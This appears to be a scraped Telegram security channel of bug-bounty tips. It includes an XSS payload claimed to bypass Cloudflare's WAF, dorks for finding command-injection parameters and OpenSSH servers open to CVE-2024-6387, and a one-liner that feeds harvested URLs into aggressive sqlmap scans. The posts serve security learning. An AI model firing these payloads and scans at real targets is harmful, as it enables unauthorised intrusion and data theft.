A payload that bypasses Cloudflare WAF
<img/src=x onError="`${x}`;alert(`Hello`);">
<img/src=x onError="`${x}`;alert(`Hello`);">
π11
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯1
This media is not supported in your browser
VIEW IN TELEGRAM
π’CSPRecon: Discover new target domains using Content Security Policy.
β οΈThis project was created for educational purposes and should not be used in environments without legal authorization.
π Download: https://github.com/edoardottt/csprecon
β οΈThis project was created for educational purposes and should not be used in environments without legal authorization.
π Download: https://github.com/edoardottt/csprecon
π7
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - v4d1/Dome: Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan toβ¦
Dome - Subdomain Enumeration Tool. Fast and reliable python script that makes active and/or passive scan to obtain subdomains and search for open ports. - GitHub - v4d1/Dome: Dome - Subdomain Enum...
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯3π€‘2
β οΈ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw βregreSSHionβ Exposes Millions of Linux Systems
π―96.4 million+ Results are found on the en.fofa.info nearly year.
π₯FOFA Dork: app="OpenSSH"
πRefer: https://lnkd.in/gkENKHPv
βΉοΈPOC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
π―96.4 million+ Results are found on the en.fofa.info nearly year.
π₯FOFA Dork: app="OpenSSH"
πRefer: https://lnkd.in/gkENKHPv
βΉοΈPOC: https://lnkd.in/gzEWNHAX
#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
π₯2
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯4β€βπ₯1π1
πList of GitHub Dorks for bug bounties.
πFinding
target Files, Languages, API Keys,
Tokens, Usernames, Passwords, Information using
Dates, Extension π
π#infosec #cybersecurity #hacking #pentesting #security
πFinding
target Files, Languages, API Keys,
Tokens, Usernames, Passwords, Information using
Dates, Extension π
π#infosec #cybersecurity #hacking #pentesting #security
π₯7π1
Who is a good speaker? π @Mebledy do you want to live podcast with everyone?
π Advanced Web Application Penetration Testing Course - Elevate Your Cybersecurity Skills! π
π Full Course Curriculum: https://brutsec.com/WebPentesting.pdf
ποΈ Course Details:
Starting: July 16th, 4PM IST
Duration: 2 Months
Schedule: 3 Days a Week
Format: Online Classes
Languages: Hindi, English, Bengali
π Why Enroll?
Gain practical, hands-on experience with a curriculum that covers a wide range of advanced web security topics. Hereβs what youβll learn:
- π Reconnaissance Techniques
- π Subdomain Enumeration
- π» Port Scanning
- π οΈ HTML Injection
- π‘οΈ XSS (Cross-Site Scripting)
- π SQL Injection
- π File Uploading
- 𧩠CORS Exploitation
- π΅οΈββοΈ Command Injection
π Enroll Now:
Feel free to DM your queries on our WhatsApp: https://wa.me/918945971332
#bugbounty #bugbountytips #cybersecurity
π Full Course Curriculum: https://brutsec.com/WebPentesting.pdf
ποΈ Course Details:
Starting: July 16th, 4PM IST
Duration: 2 Months
Schedule: 3 Days a Week
Format: Online Classes
Languages: Hindi, English, Bengali
π Why Enroll?
Gain practical, hands-on experience with a curriculum that covers a wide range of advanced web security topics. Hereβs what youβll learn:
- π Reconnaissance Techniques
- π Subdomain Enumeration
- π» Port Scanning
- π οΈ HTML Injection
- π‘οΈ XSS (Cross-Site Scripting)
- π SQL Injection
- π File Uploading
- 𧩠CORS Exploitation
- π΅οΈββοΈ Command Injection
π Enroll Now:
Feel free to DM your queries on our WhatsApp: https://wa.me/918945971332
#bugbounty #bugbountytips #cybersecurity
π2π₯1
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯2
Brut Security pinned Β«π Advanced Web Application Penetration Testing Course - Elevate Your Cybersecurity Skills! π π Full Course Curriculum: https://brutsec.com/WebPentesting.pdf ποΈ Course Details: Starting: July 16th, 4PM IST Duration: 2 Months Schedule: 3 Days a Week Format:β¦Β»
inurl:cmd | inurl:exec= | inurl:query= | inurl:code= | inurl:do= | inurl:run= | inurl:read= | inurl:ping= inurl:& site:example[.]com
Please open Telegram to view this post
VIEW IN TELEGRAM
π3β€1
subfinder -dL subdomain.txt | grep -Eo 'https?://[^ ]+\?[a-zA-Z0-9_-]+=\d+['"'"'"]?' wayback_urls.txt > potential_sqli.txt && while read url; do sqlmap -u "$url" --batch --level 5 --risk 3 --all --random-agent --time-sec 10 ; done < potential_sqli.txt
Please open Telegram to view this post
VIEW IN TELEGRAM
π₯6β€2
CVE-2024-6387 (and probably CVE-2006-5051): Unauthenticated RCE in OpenSSH π₯
The vulnerability, discovered by Qualys researchers, allows an attacker to perform RCE on any OpenSSH server, provided that the operating system contains the glibc library.
Versions 8.5p1 to 9.8p1 ββare affected, and versions <4.4p are also potentially vulnerable.
Search at Netlas.io:
ππ» Link: https://nt.ls/ySN3C
ππ» Dork: tag.openssh.version:(>=8.5 AND <9.8) OR tag.openssh.version:(<4.4)
Read more: https://www.qualys.com/regresshion-cve-2024-6387/
The vulnerability, discovered by Qualys researchers, allows an attacker to perform RCE on any OpenSSH server, provided that the operating system contains the glibc library.
Versions 8.5p1 to 9.8p1 ββare affected, and versions <4.4p are also potentially vulnerable.
Search at Netlas.io:
ππ» Link: https://nt.ls/ySN3C
ππ» Dork: tag.openssh.version:(>=8.5 AND <9.8) OR tag.openssh.version:(<4.4)
Read more: https://www.qualys.com/regresshion-cve-2024-6387/
π5